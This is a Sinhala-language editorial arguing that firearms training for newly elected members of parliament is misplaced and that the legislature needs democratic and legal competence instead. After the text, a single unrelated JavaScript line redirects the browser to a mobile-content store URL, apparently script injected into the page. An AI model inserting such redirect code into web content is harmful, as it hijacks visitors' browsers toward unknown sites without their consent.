අවි පුහුණුව අවශ්‍ය පාතාලයන්ටය

නවක පාර්ලිමේන්තු මන්ත‍්‍රීවරුන්ට විශේෂ කාර්ය බලකා කඳවුරක දී ගිනි අවි භාවිතය පිළිබඳ පුහුණුවක් ලබා දෙන බව මාධ්‍ය වාර්තා කරයි. ආණ්ඩුවෙන් එම පුහුණුව සාධාරණීකරණය වන්නේ, නවක මන්ත‍්‍රීවරුන් ආරක්‍ෂාව සඳහා ගිනි අවි ඉල්ලා ඇති බවත්, ඔවුන්ට එම අවි ආරක්‍ෂාකාරී ව පාවිච්චි කිරීම පහසු වනු පිණිස මෙම පුහුණුව ලබා දෙන බවත් කීමෙන් ය.

දිනේෂ් ගුණවර්ධන මහතා මාධ්‍යවලට ප‍්‍රකාශ කොට තිබුණේ, මෙම අවි පුහුණුව ලබා දීම පසුගිය ගැටුම් සහිත සමයේ මන්ත‍්‍රීවරුන්ගේ ආරක්‍ෂාව සඳහා ගන්නා ලද පියවරක්් බවත්, වර්තමානයේ එවැනි අවශ්‍යතාවක් නැති බවත් ය. ඔහුගේ විග‍්‍රහය පැහැදිලි ය. පසුගිය ගැටුම් සමයේ දී ආරක්‍ෂාව පිළිබඳ බලවත් ප‍්‍රශ්න තිබුණු නිසා, තමන්ගේ ආරක්‍ෂාව තමන් විසින් ම සලසා ගැනීමේ බරපතළ තත්ත්වයක් සියල්ලන්ට ම නැති වුණත් සමහරුන් කෙරෙහි ඇති විය. එහිදී කිසියම් දුරකට අවි පුහුණුවක් වැදගත් වන්නට තිබිණි.

එහෙත් දැන් එවැන්නක් කුමට ද? අප දැන් සිටින්නේ ඒ අඳුරු සමය ජාතියේ මතකයෙන් ඉවත් කිරීමට උත්සාහ ගන්නා කාලයක ය. අනෙක් අතට, ව්‍යවස්ථාදායකය, විධායකය, අධිකරණය මෙන් ම ජනතා පරමාධිපත්‍යය යනාදි පැතිවලින් ද පසුගිය කාලයේ අප අමතක කර දමා සිටි වගකීම් මැනැවින් සිතා බලා යළි ජාතියක් ලෙස ඒවා පවරා ගැනීමේ සංක‍්‍රාන්තික කාලයක ය. එවැනි කාලයක, පරණ බිහිසුණු නාඩගම් යළි කරළියට ගෙන ආ යුත්තේ ඇයි? ඒ දේවල් නැවත එලෙස සිදුවන්නේ නම් ජනවාරි හා අගෝස්තු ලෙස රටේ මහජනයා කළ වෙනසේ අර්ථය කුමක් ද?

විශේෂයෙන් ව්‍යවස්ථාදායකය ගතහොත්, අලූත් රටක් සඳහා ව්‍යවස්ථාදායකයේ කාර්යභාරය කුමක් විය යුතු ද? ලෝක සන්දර්භයක් මත රටේ නීති සැකසීමේ දී ව්‍යවස්ථාදායකයේ සාමාජිකයන් කෙතරම් දැනුමෙන්, බුද්ධියෙන් හා අවබෝධයෙන් පරිපූර්ණ විය යුතු ද? කිසියම් ජාතික ප‍්‍රශ්නයක් ගැන පාර්ලිමේන්තුවේ කතාවක් පැවැත්වීම සඳහා වුවත්, කවර තරමේ විෂය පටුත්වයක් ඔවුන්ට තිබිය යුතු ද?

පසුගිය කාලයේ මරණ දඬුවම ගැන පාර්ලිමේන්තුවේ ඇති වූ විවාදයේදී පවා මේ මන්ත‍්‍රීවරුන් බහුතරයක් දැක් වූ අදහස්වලිනුත් පෙනුණේ, පාර්ලිමේන්තුවෙන් ඉටුවිය යුතු ඉදිරිගාමී කාර්යභාරය සඳහා මේ පිරිසෙන් සුවිශාල බහුතරයක් කිසිසේත් ම නොගැළපෙන බව නොවේ ද?
එවැනි සන්දර්භයක අප පටන් ගත යුත්තේ අවි ආයුධ පුහුණුවෙන් නොවේ. අවි ආයුධ පුහුණුව අවශ්‍ය වන්නේ පාතාලයන්ට ය. මහජන නියෝජිතයන්ට අවශ්‍ය වන්නේ මහජනයා අතර ගැවසෙමින් ඒ හරහා ම තමන්ගේ ආරක්‍ෂාව සලසා ගන්නේ කෙසේ ද යන පුළුල් ප‍්‍රජාතන්ත‍්‍රවාදී පරිචය මිස, ගිනි අවියක් ඉනේ ගසා ගැනීම නිසා ඇතිවන පුම්බාගත් නිර්භීතකමකින් කරන ගනුදෙනු නොවේ. එවැනි තත්ත්වයක් සංකල්පයක් වශයෙන් ම මහජනයා හා ඔවුන්ගේ නියෝජිතයා අතර පැවතිය යුතු සමාජ සම්මුතිය බිඳ දමා, එකිනෙකාට බියෙන් සැකයෙන් ජීවත්වන මාරාන්තික මහජන-නියෝජිත සම්බන්ධයක් ඇති කරවයි.

අප එවැනි සම්ප‍්‍රදායන් තව දුරටත් පවත්වා ගත යුත්තේ ඇයි?

ඒ වෙනුවට අපේ කාර්යභාරය විය යුත්තේ ජනවාරි හා අගෝස්තු මාසවල දී ප‍්‍රකාශයට පත්වුණු මහජන අභිලාෂයට සරිලන අලූත් ව්‍යවස්ථාදායකයක් නිර්මාණය කිරීමේ පියවර තැබීම ය. නවක මන්ත‍්‍රීවරුන් පවා රටේ ව්‍යවස්ථාදායක කාර්යය වචනයේ පරිසමාප්ත අර්ථයෙන් ම ඉටු කළ හැකි පිරිපුන් මහජන නියෝජිතයන්් බවට පත් කිරීමේ වගකීම ඉටු කිරීමට දැන්වත් පටන් ගත යුතු ය.

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”;